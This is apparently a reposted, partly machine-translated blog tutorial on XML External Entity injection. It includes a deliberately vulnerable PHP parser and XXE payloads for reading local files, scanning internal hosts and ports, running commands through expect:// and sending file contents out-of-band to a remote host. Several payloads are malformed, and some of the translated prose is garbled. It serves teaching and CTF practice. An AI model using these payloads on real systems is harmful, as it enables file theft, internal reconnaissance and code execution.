XML External Entity Injection Basics

Language 2023-04-16 23:56:09 views: null

XML External Entity Injection

What is xml, DTD

xml+dtd

<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE address [ <!ELEMENT address (name,company,phone)>
        <!ELEMENT name (#PCDATA)>
        <!ELEMENT company (#PCDATA)>
        <!ELEMENT phone (#PCDATA)> ]>
<address><name>Tanmay Patik</name><company>TutorialsPoint</company> <phone>(011)123-4567</phone></address>

xml

<?xml version="1.0" encoding="utf-8" ?>
<!--引入dtd文件,约束这个xml-->
<!DOCTYPE 班级 SYSTEM "xxe.dtd">
<班级>
    <学生>
        <名字>小宏</名字>
        <年龄>20</年龄>
        <介绍>ctf小白</介绍>
    </学生>
</班级>

Advantages of xml

XML is an important tool for Internet data transmission. It can cross any platform on the Internet and is not limited by programming languages ​​and operating systems. It is very suitable for Web transmission, and XML helps to shuttle structured data between servers, which is convenient for developers to control Data storage and transmission.
Moreover, all configuration files in the configuration file are written in XMl format, and data interaction is performed across platforms. It can cross operating systems and programming language platforms, so it can be seen that XML is very convenient. Application The range is also very wide, but if there are loopholes, the harm is self-evident

  语法
1.XML元素都必须有关闭标签。
2.XML 标签对大小写敏感。
3.XML 必须正确地嵌套。
4.XML 文档必须有根元素。
5.XML 的属性值须加引号。
  结构
1.XML 文档声明,在文档的第一行
2.XML 文档类型定义,即DTD,XXE 漏洞所在的地方
3.XML 文档元素

dtd

  • Document Type Definition Document Type Definition
  • https://www.tutorialspoint.com/dtd/dtd_elements.htm
  • <!ELEMENT element name type>
  • <!ELEMENT class (student+)>
<!ELEMENT 班级 (学生+)>
<!ELEMENT 学生 (名字,年龄,介绍)>
<!ELEMENT 名字 (#PCDATA)>
<!ELEMENT 年龄 (#PCDATA)>
<!ELEMENT 介绍 (#PCDATA)>

External entities (references to data in XML are called entities, and external entities are used to introduce external resources

有SYSTEM和PUBLIC两个关键字,表示实体来自本地计算机还是公共计算机,
外部实体的引用可以利用如下协议
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php


例如:
<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>

外部evil.dtd中的内容
<!ENTITY evil SYSTEM “file:///d:/1.txt” >

xxe vulnerability

what is xxe vulnerability

  • The full name of the XXE vulnerability is XML External Entity Injection, that is, the xml external entity injection vulnerability. The XXE vulnerability occurs when the application parses the XML input, and the loading of external entities is not prohibited, resulting in the loading of malicious external files, resulting in file reading, command execution, and intranet ports. Scanning, attacking intranet websites, launching dos attacks and other hazards

example

<?php
error_reporting(0);
echo LIBXML_DOTTED_VERSION;
libxml_disable_entity_loader(false);   //false时才能利用外部实体
$xmlfile = file_get_contents('php://input');   //类似文件包含读取文件
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_BIGLINES | LIBXML_NOWARNING | LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo $creds;

unfiltered xxe

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///flag">
]>
<root>
<ctfshow>
&xee;
</ctfshow>
</root>

XXE actual combat (specific application examples)

file read

Use file://php:// and other pseudo-protocols to obtain files (it is best to use php://file:// for base64 encoding)

php://filter/convert.base64-encode/resource=1.php

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=1.php">]>----DTD部分
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>
		<data>2018-10-01</data>
		<description>&xxe;</description>---内容在$xxe处回显

system file read

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "file://etc/passwd">]>----DTD部分
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>
		<data>2018-10-01</data>
		<description>&xxe;</description>

Intranet host scan

Use the protocol and the last digit of the ip address to traverse the dictionary, combined with Brup blasting to return the packet length judgment

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "http://192.168.1.1">]>----DTD部分
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>
		<data>2018-10-01</data>
		<description>&xxe;</description>

port detection

The code will try to communicate on port 8080, and the attacker can judge whether the port is opened according to the response event/length

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "http://192.168.1.1:8080">]>----DTD部分
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>
		<data>2018-10-01</data>
		<description>&xxe;</description>

remote code execution

This rarely happens, but there are cases where attackers are able to execute code via XXE, mainly due to misconfiguration/development of internal applications, and PHP's expect module is loaded into vulnerable systems or internal applications that process XML , then we can execute the following command

<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "expect://id">]>----DTD部分
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>
		<data>2018-10-01</data>
		<description>&xxe;</description>

XXE-Advanced (Blind OOB XEE)

In many cases, XXE will not directly return the content we want to read to us (no echo). Similar to blind injection in SQL injection, key data will not be directly displayed in the interface or data packets

Write files using file_put_contents

Here, if XXE has no echo, build an out-of-band data (OOB) channel to bring the data out and directly write the file to achieve the purpose of reading the data

construct payload1

<!DOCTYPE convert [<!ENTITY % SYSTEM "http://192.168.1.1/xxe.dtd">]
%remote
%int
%send
>----DTD部分  从192.168.1.1下载payload2
<catalog>
	<core id ="test101">
		<author>John</author>
		<title>I love XML</title>
		<category>Computers</category>------XML部分
		<pricr>9.99</pricr>zhe
		<data>2018-10-01</data>
		<description>&xxe;</description>

payload2

<!DOCTYPE TEST [<!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=key.php">]>
<!DOCTYPE TEST [<!ENTITY %int "<ENTITY &#37;send SYSTEM 'http://192.168.0.1/xxe.php?p=%file;'>">]>

Guess you like

Origin blog.csdn.net/qq_63928796/article/details/128199689
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com